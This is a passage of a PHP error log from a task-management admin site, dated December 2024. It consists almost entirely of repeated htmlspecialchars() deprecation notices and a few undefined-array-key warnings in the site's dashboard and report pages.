[10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:12:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 10:14:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Dec-2024 10:15:00 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Dec-2024 10:15:00 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Dec-2024 10:15:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Dec-2024 10:15:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [10-Dec-2024 10:15:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [10-Dec-2024 10:16:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [10-Dec-2024 10:16:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [10-Dec-2024 10:16:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Dec-2024 10:16:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Dec-2024 10:18:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Dec-2024 21:35:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Dec-2024 21:36:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Dec-2024 21:36:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Dec-2024 21:41:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 09:25:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP 